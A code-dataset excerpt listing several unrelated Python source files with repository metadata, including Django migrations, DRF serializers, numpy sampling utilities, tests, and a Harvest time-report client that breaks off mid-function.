hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringdate 2015-01-01 00:00:47 2022-03-31 23:42:18 ⌀ | max_issues_repo_issues_event_max_datetime stringdate 2015-01-01 17:43:30 2022-03-31 23:59:58 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3aeaaea0220995b51a401a8289992641fdab006b | 238 | py | Python | ytdl_gui/__init__.py | Aakodal/ytdl-python | fa40b7722fb51c8cad17d690b83b0f08f36c203a | [
"MIT"
] | null | null | null | ytdl_gui/__init__.py | Aakodal/ytdl-python | fa40b7722fb51c8cad17d690b83b0f08f36c203a | [
"MIT"
] | null | null | null | ytdl_gui/__init__.py | Aakodal/ytdl-python | fa40b7722fb51c8cad17d690b83b0f08f36c203a | [
"MIT"
] | null | null | null | import bottle
# Use a regular import instead of the `__import__("pathlib")` one-liner hack.
import pathlib

# Directory containing this package, so template lookup works regardless of
# the process' current working directory.
root = pathlib.Path(__file__).resolve().parent
bottle.TEMPLATE_PATH = [str(root / "views")]

app = bottle.default_app()

# Local-only GUI server; port chosen near the top of the valid range.
host = "127.0.0.1"
port = "65534"

# Imported at the bottom for their route-registration side effects
# (they need `app`/`bottle.TEMPLATE_PATH` to be configured first).
from . import controller
from . import download_video
| 19.833333 | 60 | 0.722689 |
3aeb5f1a3b042dd49ac3276109266415fd562f10 | 2,045 | py | Python | src/emutils/geometry/ball.py | emanuele-albini/emutils | d5e3939da8a14b629879f06d87d4bd371e7117ab | [
"MIT"
] | null | null | null | src/emutils/geometry/ball.py | emanuele-albini/emutils | d5e3939da8a14b629879f06d87d4bd371e7117ab | [
"MIT"
] | null | null | null | src/emutils/geometry/ball.py | emanuele-albini/emutils | d5e3939da8a14b629879f06d87d4bd371e7117ab | [
"MIT"
] | null | null | null | import logging
import numpy as np
# Public API of this module: star-imports expose only the samplers below.
__all__ = [
    'generate_random_points_inside_balls',
    'generate_random_point_inside_balls',
    'generate_random_points_inside_ball',
    'generate_random_point_inside_ball',
]
# %%
def generate_random_points_inside_balls(
    X,
    normalizer,
    mode,
    phi,
    n=1,
    model=None,
    different_prediction=False,
):
    """Draw ``n`` uniform random points inside a ball around each row of ``X``.

    The per-feature ball diameter comes from
    ``normalizer.feature_deviation(method=mode, phi=phi)``.  When
    ``different_prediction`` is True, candidate points are rejected and
    re-drawn until ``model`` assigns them the same prediction as the centre
    point.  Returns an array of shape ``(len(X), n, nb_features)``.
    """
    if different_prediction and model is None:
        raise ValueError('You must pass the model in order to filter points.')
    if not different_prediction and model is not None:
        logging.warning('Model passed to `generate_random_points_inside_balls` but `different_prediction = False`.')

    # Per-feature ball diameter in the normalizer's space.
    diameter = normalizer.feature_deviation(method=mode, phi=phi)
    nb_features = X.shape[1]

    def _sample_around(x, count, label=None):
        # Base case of the rejection-sampling recursion: nothing left to draw.
        if count == 0:
            return np.array([]).reshape(0, nb_features)
        # Uniform offsets in [-0.5, 0.5) per feature, scaled by the diameter.
        offsets = np.random.rand(count, nb_features) - .5
        candidates = normalizer.shift(
            np.tile(x, (count, 1)),
            shifts=np.tile(diameter, (count, 1)) * offsets,
            method=mode,
        )
        if label is None:
            return candidates
        kept = candidates[model.predict(candidates) == label]
        # Recurse to top up whatever was rejected until `count` are accepted.
        return np.concatenate(
            [kept, _sample_around(x, count - len(kept), label=label)],
            axis=0,
        )

    if different_prediction:
        labels = model.predict(X)
        return np.array([_sample_around(x, n, lbl) for x, lbl in zip(X, labels)])
    return np.array([_sample_around(x, n) for x in X])
def generate_random_point_inside_balls(X, *args, **kwargs):
    """Draw one random point per ball; returns shape ``(len(X), nb_features)``."""
    samples = generate_random_points_inside_balls(X, *args, n=1, **kwargs)
    return samples[:, 0, :]
def generate_random_points_inside_ball(x, *args, **kwargs):
    """Draw points inside the ball around a single centre point ``x``."""
    batch = generate_random_points_inside_balls(np.array([x]), *args, **kwargs)
    return batch[0]
def generate_random_point_inside_ball(x, *args, **kwargs):
    """Draw a single random point inside the ball around ``x``."""
    return generate_random_points_inside_ball(x, *args, n=1, **kwargs)[0]
# %%
| 28.402778 | 116 | 0.6489 |
3aec38a277d65b28e5bc3af20165517902bdb701 | 1,189 | py | Python | day03/part1.py | mtn/advent19 | 15d4ae84d248fcf66cb5ebdefee7cad4e6c4a9c2 | [
"MIT"
] | null | null | null | day03/part1.py | mtn/advent19 | 15d4ae84d248fcf66cb5ebdefee7cad4e6c4a9c2 | [
"MIT"
] | null | null | null | day03/part1.py | mtn/advent19 | 15d4ae84d248fcf66cb5ebdefee7cad4e6c4a9c2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
def getpts(path):
    """Trace a wire path and return the set of grid points it passes through.

    ``path`` is a sequence of steps like ``"R8"`` (direction letter plus a
    distance).  Screen-style coordinates are used: 'U' decreases y and 'D'
    increases y.  The origin itself is not included in the result.
    """
    deltas = {"R": (1, 0), "L": (-1, 0), "U": (0, -1), "D": (0, 1)}
    x, y = 0, 0
    visited = set()
    for step in path:
        dx, dy = deltas[step[0]]
        for _ in range(int(step[1:])):
            # Advance one cell at a time so every intermediate point is kept.
            x += dx
            y += dy
            visited.add((x, y))
    return visited
# Read the two wire descriptions, one comma-separated path per line.
with open("input.txt") as f:
    wire_specs = f.read().strip().split("\n")

path1, path2 = (spec.split(",") for spec in wire_specs)

pts1 = getpts(path1)
pts2 = getpts(path2)
# Points visited by both wires.
intersections = pts1.intersection(pts2)

# Find the crossing closest to the origin by Manhattan distance.
min_dist = None
closest = None
for point in intersections:
    manhattan = abs(point[0]) + abs(point[1])
    if min_dist is None or manhattan < min_dist:
        closest = point
        min_dist = manhattan

print(min_dist)
| 23.78 | 78 | 0.502103 |
3aece6336549f29b4f897302ef630eedb4bbc785 | 609 | py | Python | tests/plugins/test_openrectv.py | hymer-up/streamlink | f09bf6e04cddc78eceb9ded655f716ef3ee4b84f | [
"BSD-2-Clause"
] | 5 | 2017-03-21T19:43:17.000Z | 2018-10-03T14:04:29.000Z | tests/plugins/test_openrectv.py | hymer-up/streamlink | f09bf6e04cddc78eceb9ded655f716ef3ee4b84f | [
"BSD-2-Clause"
] | 7 | 2016-10-13T23:29:31.000Z | 2018-06-28T14:04:32.000Z | tests/plugins/test_openrectv.py | bumplzz69/streamlink | 34abc43875d7663ebafa241573dece272e93d88b | [
"BSD-2-Clause"
] | 2 | 2016-11-24T18:37:33.000Z | 2017-03-21T19:43:49.000Z | import unittest
from streamlink.plugins.openrectv import OPENRECtv
class TestPluginOPENRECtv(unittest.TestCase):
    """Verify which URLs the OPENRECtv plugin claims it can handle."""

    def test_can_handle_url(self):
        # URLs the plugin is expected to accept.
        matching_urls = (
            'https://www.openrec.tv/live/DXRLAPSGTpx',
            'https://www.openrec.tv/movie/JsDw3rAV2Rj',
        )
        for candidate in matching_urls:
            self.assertTrue(OPENRECtv.can_handle_url(candidate))

    def test_can_handle_url_negative(self):
        # URLs the plugin must reject.
        non_matching_urls = (
            'https://www.openrec.tv/',
        )
        for candidate in non_matching_urls:
            self.assertFalse(OPENRECtv.can_handle_url(candidate))
| 29 | 59 | 0.648604 |
3aedb392cb14830050e8adbbfe3be5d562d42189 | 2,264 | py | Python | spotify/migrations/0001_initial.py | FattyMango/Syncfy | 291bda024d91f9c6fd5f59c073ecf16c90325d8a | [
"Apache-2.0"
] | null | null | null | spotify/migrations/0001_initial.py | FattyMango/Syncfy | 291bda024d91f9c6fd5f59c073ecf16c90325d8a | [
"Apache-2.0"
] | null | null | null | spotify/migrations/0001_initial.py | FattyMango/Syncfy | 291bda024d91f9c6fd5f59c073ecf16c90325d8a | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.3 on 2021-05-07 18:57
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the app: Lobby, current_song and Access_token."""

    # First migration of this app.
    initial = True

    dependencies = [
        # Needed because ForeignKey/ManyToMany fields below point at the
        # (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # A listening lobby owned by one user with many connected users.
        # NOTE(review): related_name 'users_conntected' looks like a typo for
        # 'users_connected'; fixing it now would need a follow-up migration.
        migrations.CreateModel(
            name='Lobby',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_created', models.DateField(auto_now_add=True, null=True)),
                ('is_active_playback', models.BooleanField(default=False)),
                ('is_active', models.BooleanField(blank=True, default=True, null=True)),
                ('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lobbyuser1', to=settings.AUTH_USER_MODEL)),
                ('users_connected', models.ManyToManyField(blank=True, related_name='users_conntected', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # The track currently playing in a lobby (Spotify URI).
        migrations.CreateModel(
            name='current_song',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('current_uri', models.CharField(blank=True, max_length=100, null=True)),
                ('date_created', models.DateField(auto_now_add=True, null=True)),
                ('lobby', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lobby', to='spotify.lobby')),
            ],
        ),
        # Per-user OAuth credentials.
        # NOTE(review): 'expiers_at' looks like a typo for 'expires_at';
        # renaming would require another migration, so it is only flagged here.
        migrations.CreateModel(
            name='Access_token',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('access_token', models.CharField(blank=True, max_length=500, null=True)),
                ('refresh_token', models.CharField(blank=True, max_length=500, null=True)),
                ('expiers_at', models.CharField(blank=True, max_length=100, null=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='token_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 47.166667 | 146 | 0.628534 |
3aedf299041cb35f549d54f7d93a4515346863a2 | 6,474 | py | Python | paginas/insights.py | Campos1989/AssureNextDataApp | 65023e3e34a8bd8f80d53fce46778d2f4cf9b640 | [
"MIT"
] | 1 | 2021-06-25T08:53:31.000Z | 2021-06-25T08:53:31.000Z | paginas/insights.py | Campos1989/AssureNextDataApp | 65023e3e34a8bd8f80d53fce46778d2f4cf9b640 | [
"MIT"
] | null | null | null | paginas/insights.py | Campos1989/AssureNextDataApp | 65023e3e34a8bd8f80d53fce46778d2f4cf9b640 | [
"MIT"
] | null | null | null | # Script de criação do dashboard
# https://dash.plotly.com/dash-html-components
# Imports
import traceback
import pandas as pd
import plotly.express as px
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
from dash.dependencies import Input, Output
# Módulos customizados
from app import app
from modulos import data_operations, constant
# Gera o layout
def get_layout():
    """Build the Dash layout for the insights page.

    Returns a dbc.Container holding two rows of prediction summary cards
    (year, predicted policies, predicted machines, average profit for 2016
    and 2017) followed by three narrative text cards.  If anything raises
    while building the layout, a 500-style Jumbotron showing the traceback
    is returned instead so the app keeps rendering.
    """
    try:
        # Build the container
        layout = dbc.Container([
            # Row 1: prediction summary cards for 2016.
            dbc.Row([
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Ano"),
                    dbc.CardBody([html.H5(data_operations.Ano2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Seguros Previstos"),
                    dbc.CardBody([html.H5(data_operations.TotalNewPolicies2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Maquinas Previstas"),
                    dbc.CardBody([html.H5(data_operations.MachinesInstalled2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Lucro Medio"),
                    dbc.CardBody([html.H5(data_operations.LucroMedio2016, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3)],
                className= "pb-3"),
            # Row 2: the same summary cards, for the 2017 predictions.
            dbc.Row([
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Ano"),
                    dbc.CardBody([html.H5(data_operations.Ano2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Seguros Previstos"),
                    dbc.CardBody([html.H5(data_operations.TotalNewPolicies2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Maquinas Previstas"),
                    dbc.CardBody([html.H5(data_operations.MachinesInstalled2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3),
                dbc.Col([
                    dbc.Card([dbc.CardHeader("Lucro Medio"),
                    dbc.CardBody([html.H5(data_operations.LucroMedio2017, className = "card-text")]),], className = "shadow p-3 bg-light rounded")], width = 3)],
                className= "pb-3"),
            # Narrative card describing the "overview" page (Portuguese copy).
            dbc.Row([
                dbc.Card([dbc.CardBody([html.H6("Na página visão geral temos o total de seguros vendidos, maquinas instaladas e lucro médio ao longo dos anos 2009 a 2015 nos cardes. No gráfico das contratações de seguros, percebe-se uma tendência, crescente de novas aquisições até o ano de 2013, depois uma leve queda entre os anos 2015 e 2016, porem algo interessante a se notar é que em todos os anos os picos de contratações ocorrem em março, seria interessante a empresa investigar o porquê. Em relação a instalação de máquinas seguem também um padrão quase constante, onde podemos notar picos de instalações maiores nos meses de dezembro. Embora nos últimos anos (2014,2015) a empresa tenho tido menos contratações, assim como instalações de máquinas, o seu lucro médio anual não caiu, aumenta a cada ano, isso mostra uma eficiência da empresa em manter clientes antigos.", className = "card-text")]),],className = "shadow p-3 bg-light rounded"),],
                className= "pb-3"),
            # Narrative card describing the "predictions" page.
            dbc.Row([
                dbc.Card([dbc.CardBody([html.H6("Na página previsões, temos o primeiro gráfico mostrando as previsões (tendências) para aquisição de novas apólices, podemos ver as previsões do modelo para todos os anos, e os pontos pretos sendo os dados atuais, pode-se notar que o modelo fez um bom trabalho, levando em consideração que as previsões estão dentro da margem de erro que é a parte sombreada, já o segundo gráfico mostra apenas os valores para os anos a serem previstos. O mesmo ocorre nos gráficos 3 e 4, esses já com relação a instalações de novas maquinas. Com essas previsões os gestores podem se preparar para os próximos dois anos se baseando no que o modelo previu como tendência. ", className = "card-text")]),],className = "shadow p-3 bg-light rounded"),],
                className= "pb-3"),
            # Narrative card describing this "insights" page.
            dbc.Row([
                dbc.Card([dbc.CardBody([html.H6("Nessa página de insights, é mostrado resumidamente o total, de novas contratações e novas instalações de maquinas assim como o lucro médio dos anos previstos, todas as essas previsões com visto na página previsões seguem um padrão, identificado pelo modelo com relação aos anos anteriores, embora a previsão para novas contratações para 2017 não esteja tão alto, o lucro médio não caiu tanto, o modelo levou em consideração a tendência que vem ocorrendo em que a empresa tem uma boa qualidade de serviço fazendo com que os clientes antigos permaneçam com os serviços a cada ano. Todas as informações acima e os gráficos são valiosas, pois os gestores conseguem agora identificar padrões e possivelmente algumas falhas, e com isso entender o que pode vir a ocorrer, se manter o trabalho que vem feito, e até buscar melhorias para que atinja valores acima do previsto.", className = "card-text")]),],className = "shadow p-3 bg-light rounded"),],
                className= "pb-3")
        ],
        fluid = True)
        return layout
    except:
        # Fall back to a 500-style panel with the traceback instead of
        # letting the whole Dash app crash.
        layout = dbc.Jumbotron(
            [
                html.Div([
                    html.H1("500: Internal Server Error", className = "text-danger"),
                    html.Hr(),
                    html.P(f"Following Exception Occured: "),
                    html.Code(traceback.format_exc())
                ],
                style = constant.NAVITEM_STYLE)
            ]
        )
        return layout
| 78.95122 | 998 | 0.605653 |
3aef6a1d97b22b7334946b3961dc63d93d47db28 | 752 | py | Python | api/serializers.py | isabella232/urlprompt | b689ed0f2e82633653d181959af304590fea8b02 | [
"Apache-2.0"
] | null | null | null | api/serializers.py | isabella232/urlprompt | b689ed0f2e82633653d181959af304590fea8b02 | [
"Apache-2.0"
] | 6 | 2021-09-30T11:31:58.000Z | 2022-03-21T15:12:28.000Z | api/serializers.py | isabella232/urlprompt | b689ed0f2e82633653d181959af304590fea8b02 | [
"Apache-2.0"
] | 1 | 2022-03-27T16:53:05.000Z | 2022-03-27T16:53:05.000Z | from rest_framework import serializers
from core.models import Prompt, CustomUser
class CustomUserSerializer(serializers.ModelSerializer):
    """Minimal user representation: id and username only."""

    class Meta:
        model = CustomUser
        fields = [
            "id",
            "username",
        ]
class PromptSerializer(serializers.HyperlinkedModelSerializer):
    """Serialize a Prompt together with a nested summary of its creator."""

    # Nested representation of the creating user; optional on write.
    created_by = CustomUserSerializer(required=False)

    class Meta:
        model = Prompt
        fields = [
            "id",
            "created_at",
            "status",
            "schema",
            "url",
            "created_by",
            "response",
        ]
        # Identity/audit fields are set by the server, never by clients.
        read_only_fields = [
            "id",
            "created_at",
            "created_by",
            "modified_at",
            "status",
            "url",
        ]
class PromptResponseSerializer(serializers.ModelSerializer):
    """Expose only a Prompt's `response` field, and require it."""

    class Meta:
        model = Prompt
        fields = ["response"]
        # `response` must be supplied when using this serializer.
        extra_kwargs = {"response": {"required": True}}
3aef79b3128b41665021c29aae4c84fa02130963 | 246 | py | Python | tests/test-config.py | kjdoyle/elyra | bfb79a8e84c85b7d0f39bb168224aed69dbbd808 | [
"Apache-2.0"
] | 2 | 2020-05-23T11:21:31.000Z | 2020-06-03T22:52:09.000Z | tests/test-config.py | kjdoyle/elyra | bfb79a8e84c85b7d0f39bb168224aed69dbbd808 | [
"Apache-2.0"
] | null | null | null | tests/test-config.py | kjdoyle/elyra | bfb79a8e84c85b7d0f39bb168224aed69dbbd808 | [
"Apache-2.0"
] | 1 | 2020-05-17T15:19:13.000Z | 2020-05-17T15:19:13.000Z | c.Session.debug = True
c.LabApp.token = 'test'
c.LabApp.open_browser = False
c.NotebookApp.port_retries = 0
c.LabApp.workspaces_dir = './build/cypress-tests'
c.FileContentsManager.root_dir = './build/cypress-tests'
c.LabApp.quit_button = False
| 30.75 | 56 | 0.764228 |
3af126e2b1c1da6fe4b8a9b65f8ca9e789c79dde | 191 | py | Python | apps/access/admin.py | usdigitalresponse/rtovid-encampments | b9d0b6ff27c0b47e31b5db5b0f2f92a1da446f86 | [
"MIT"
] | 1 | 2021-06-22T10:11:10.000Z | 2021-06-22T10:11:10.000Z | apps/access/admin.py | usdigitalresponse/rtovid-encampments | b9d0b6ff27c0b47e31b5db5b0f2f92a1da446f86 | [
"MIT"
] | 23 | 2020-05-28T01:00:01.000Z | 2020-06-23T12:49:55.000Z | apps/access/admin.py | RTCovid/encampments | b9d0b6ff27c0b47e31b5db5b0f2f92a1da446f86 | [
"MIT"
] | null | null | null | from django.contrib.gis import admin
from apps.access.models import InvitedEmail
class InvitedEmailAdmin(admin.ModelAdmin):
    """Stock ModelAdmin used to manage InvitedEmail records."""


admin.site.register(InvitedEmail, InvitedEmailAdmin)
| 17.363636 | 52 | 0.816754 |
3af3501863237636c8ad601e7b05518a6b063f13 | 1,550 | py | Python | phr/ciudadano/migrations/0053_antecedentereaccionadversamedicamento.py | richardqa/django-ex | e5b8585f28a97477150ac5daf5e55c74b70d87da | [
"CC0-1.0"
] | null | null | null | phr/ciudadano/migrations/0053_antecedentereaccionadversamedicamento.py | richardqa/django-ex | e5b8585f28a97477150ac5daf5e55c74b70d87da | [
"CC0-1.0"
] | null | null | null | phr/ciudadano/migrations/0053_antecedentereaccionadversamedicamento.py | richardqa/django-ex | e5b8585f28a97477150ac5daf5e55c74b70d87da | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 14:10
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Add the AntecedenteReaccionAdversaMedicamento table (adverse drug
    reaction history for a citizen)."""

    dependencies = [
        # Must run after the previous migration of this app.
        ('ciudadano', '0052_auto_20170920_1003'),
    ]

    operations = [
        migrations.CreateModel(
            name='AntecedenteReaccionAdversaMedicamento',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fecha_creacion', models.DateTimeField(auto_now_add=True, null=True)),
                ('fecha_modificacion', models.DateTimeField(auto_now=True, null=True)),
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
                # Soft-delete flag; rows are marked removed rather than deleted.
                ('es_removido', models.BooleanField(default=False, editable=False)),
                ('familia_medicamento', models.CharField(max_length=10)),
                ('medicamento', models.CharField(max_length=10)),
                ('anio_diagnostico', models.CharField(blank=True, max_length=4, null=True)),
                ('observaciones', models.TextField(blank=True, null=True)),
                # '0' = No, '1' = Yes, '2' = Doesn't know.
                ('registro_antecedente', models.CharField(choices=[('0', 'No'), ('1', 'Sí'), ('2', 'No sabe')], default='1', max_length=1)),
                # Loose references stored as UUIDs, not ForeignKeys —
                # presumably they point at records in other services; verify.
                ('consulta_paciente', models.UUIDField()),
                ('ciudadano', models.UUIDField()),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| 41.891892 | 140 | 0.593548 |
3af4df280e903825cd489383b9d45d6281eb6687 | 491 | py | Python | test/log_check.py | talareq/selenium | 302804aa34149ea38b42fe7b55d806211e9e4435 | [
"Apache-2.0"
] | null | null | null | test/log_check.py | talareq/selenium | 302804aa34149ea38b42fe7b55d806211e9e4435 | [
"Apache-2.0"
] | null | null | null | test/log_check.py | talareq/selenium | 302804aa34149ea38b42fe7b55d806211e9e4435 | [
"Apache-2.0"
] | null | null | null |
def test_example(app):
    """Click every catalog row and print any browser-console log entries."""
    app.login_admin()
    app.get("http://localhost/litecart/admin/?app=catalog&doc=catalog&category_id=1")
    rows = app.driver.find_elements_by_css_selector("tr .row")
    for index in range(len(rows)):
        # Re-locate the rows on each pass: clicking navigates away and
        # stales the previously fetched element references.
        fresh_rows = app.driver.find_elements_by_css_selector("tr .row")
        fresh_rows[index].click()
        for entry in app.driver.get_log("browser"):
            print(entry)
        # Return to the catalog listing before clicking the next row.
        app.driver.get("http://localhost/litecart/admin/?app=catalog&doc=catalog&category_id=1")
3af623d8cb194fe7d9a3384310c51e0b984f4828 | 302 | py | Python | Tracking/Image/pygui1.py | RoosterQMonee/GTAG-PyAI | 1bef3cfc85da034f9129a008bd6c5e9114ce3cfd | [
"MIT"
] | null | null | null | Tracking/Image/pygui1.py | RoosterQMonee/GTAG-PyAI | 1bef3cfc85da034f9129a008bd6c5e9114ce3cfd | [
"MIT"
] | 1 | 2022-03-30T14:11:13.000Z | 2022-03-30T14:11:37.000Z | Tracking/Image/pygui1.py | RoosterQMonee/GTAG-PyAI | 1bef3cfc85da034f9129a008bd6c5e9114ce3cfd | [
"MIT"
] | null | null | null | from pyautogui import *
import pyautogui
import time
# Poll the screen twice a second and report whether 'img.png' is currently
# visible inside the given region.
while True:  # idiomatic spelling of an intentional infinite loop
    match = pyautogui.locateOnScreen(
        'img.png', region=(150, 175, 350, 600), grayscale=True, confidence=0.8
    )
    # locateOnScreen returns None when nothing matches; compare with `is`,
    # not `!=` (PEP 8).
    if match is not None:
        print("I can see it")
    else:
        print("I am unable to see it")
    # Both branches slept for the same time, so the delay is hoisted here.
    time.sleep(0.5)
3af692d7975c4dc7bec14dbb6e213b560c3130d8 | 7,526 | py | Python | harvest/detailedreports.py | rzuris/python-harvest_apiv2 | 1a4915c2772aa9d27b74a545b14138d418566832 | [
"MIT"
] | null | null | null | harvest/detailedreports.py | rzuris/python-harvest_apiv2 | 1a4915c2772aa9d27b74a545b14138d418566832 | [
"MIT"
] | null | null | null | harvest/detailedreports.py | rzuris/python-harvest_apiv2 | 1a4915c2772aa9d27b74a545b14138d418566832 | [
"MIT"
] | 1 | 2022-03-28T10:47:37.000Z | 2022-03-28T10:47:37.000Z |
# Copyright 2020 Bradbase
import itertools
from datetime import datetime, timedelta, date
from calendar import monthrange
from harvest import Harvest
from .harvestdataclasses import *
class DetailedReports(Harvest):
    """Harvest client extension that reproduces Harvest's "detailed time" report."""

    def __init__(self, uri, auth):
        super().__init__(uri, auth)
        # Per-entity caches so repeated report rows don't re-fetch from the API.
        # (Only user_cache is populated by this class at present.)
        self.client_cache = {}
        self.project_cache = {}
        self.task_cache = {}
        self.user_cache = {}

    def timeframe(self, timeframe, from_date=None, to_date=None):
        """Translate a named timeframe into ``{'from_date': ..., 'to_date': ...}``.

        Supported names (case-insensitive): This/Last Week, This/Last
        Semimonth, This/Last Month, This/Last Quarter, This/Last Year, and
        'All Time', which returns an empty dict (no date filter).

        Raises ValueError for 'Custom' (not yet supported) or any unknown name.
        The ``from_date``/``to_date`` parameters are accepted but currently
        unused (reserved for the 'Custom' timeframe).
        """
        # quarters[month] -> [first_month, last_month] of that month's quarter.
        quarters = [None,
                    [1, 3], [1, 3], [1, 3],
                    [4, 6], [4, 6], [4, 6],
                    [7, 9], [7, 9], [7, 9],
                    [10, 12], [10, 12], [10, 12]]
        today = datetime.now().date()
        timeframe_upper = timeframe.upper()

        if timeframe_upper == 'THIS WEEK':
            # Week starts on Monday (weekday() == 0).
            start_date = today - timedelta(days=today.weekday())
            end_date = start_date + timedelta(days=6)

        elif timeframe_upper == 'LAST WEEK':
            today = today - timedelta(days=7)
            start_date = today - timedelta(days=today.weekday())
            end_date = start_date + timedelta(days=6)

        elif timeframe_upper == 'THIS SEMIMONTH':
            # Semimonths are the 1st-15th and the 16th-end of month.
            if today.day <= 15:
                start_date = today.replace(day=1)
                end_date = today.replace(day=15)
            else:
                start_date = today.replace(day=16)
                end_date = today.replace(
                    day=monthrange(today.year, today.month)[1])

        elif timeframe_upper == 'LAST SEMIMONTH':
            if today.day <= 15:
                # Previous semimonth is the back half of the previous month.
                if today.month == 1:
                    start_date = today.replace(
                        year=today.year-1, month=12, day=16)
                    end_date = today.replace(
                        year=today.year-1,
                        month=12,
                        day=monthrange(today.year-1, 12)[1])
                else:
                    start_date = today.replace(month=today.month-1, day=16)
                    end_date = today.replace(
                        month=today.month-1,
                        day=monthrange(today.year, today.month-1)[1])
            else:
                start_date = today.replace(day=1)
                end_date = today.replace(day=15)

        elif timeframe_upper == 'THIS MONTH':
            start_date = today.replace(day=1)
            end_date = today.replace(
                day=monthrange(today.year, today.month)[1])

        elif timeframe_upper == 'LAST MONTH':
            if today.month == 1:
                # January wraps back to December of the previous year.
                start_date = today.replace(year=today.year-1, month=12, day=1)
                end_date = today.replace(
                    year=today.year-1,
                    month=12,
                    day=monthrange(today.year-1, 12)[1])
            else:
                start_date = today.replace(month=today.month-1, day=1)
                end_date = today.replace(
                    month=today.month-1,
                    day=monthrange(today.year, today.month-1)[1])

        elif timeframe_upper == 'THIS QUARTER':
            quarter = quarters[today.month]
            start_date = date(today.year, quarter[0], 1)
            end_date = date(
                today.year,
                quarter[1],
                monthrange(today.year, quarter[1])[1])

        elif timeframe_upper == 'LAST QUARTER':
            if today.month <= 3:
                # Q1 wraps back to Q4 of the previous year.
                quarter = [10, 12]
                today = today.replace(year=today.year-1)
            else:
                quarter = quarters[today.month-3]
            start_date = date(today.year, quarter[0], 1)
            end_date = date(
                today.year,
                quarter[1],
                monthrange(today.year, quarter[1])[1])

        elif timeframe_upper == 'THIS YEAR':
            start_date = date(today.year, 1, 1)
            end_date = date(today.year, 12, 31)

        elif timeframe_upper == 'LAST YEAR':
            start_date = date(today.year-1, 1, 1)
            end_date = date(today.year-1, 12, 31)

        elif timeframe_upper == 'ALL TIME':
            # No date filter at all.
            return {}

        # Not currently supported
        elif timeframe_upper == 'CUSTOM':
            raise ValueError("Custom timeframe not currently supported.")

        else:
            raise ValueError(
                "unknown argument \'timeframe\': \'%s\'" % timeframe_upper)

        return {'from_date': start_date, 'to_date': end_date}

    # "team" is a list of Harvest user ids.
    def detailed_time(self, time_frame='All Time', clients=(None,), projects=(None,), tasks=(None,), team=(None,), include_archived_items=False, group_by='Date', activeProject_only=False):
        """Build a DetailedTimeReport covering every client/project/user combination.

        ``clients``, ``projects`` and ``team`` are iterables of ids, with
        ``None`` meaning "no filter" for that dimension; one paged API query
        is issued per combination.  ``tasks``, ``include_archived_items``,
        ``group_by`` and ``activeProject_only`` are accepted for interface
        compatibility but are not currently applied to the query.
        """
        arg_configs = []
        time_entry_results = DetailedTimeReport([])

        # One query configuration per (client, project, user) combination,
        # merged with the date range for the requested timeframe.
        for client_id, project_id, user_id in itertools.product(clients, projects, team):
            kwargs = {}
            if client_id is not None:
                kwargs['client_id'] = client_id
            if project_id is not None:
                kwargs['project_id'] = project_id
            if user_id is not None:
                kwargs['user_id'] = user_id
            kwargs = dict(self.timeframe(time_frame), **kwargs)
            arg_configs.append(kwargs)

        tmp_time_entry_results = []
        if arg_configs == []:
            # No filter combinations at all: fetch every time entry, page by page.
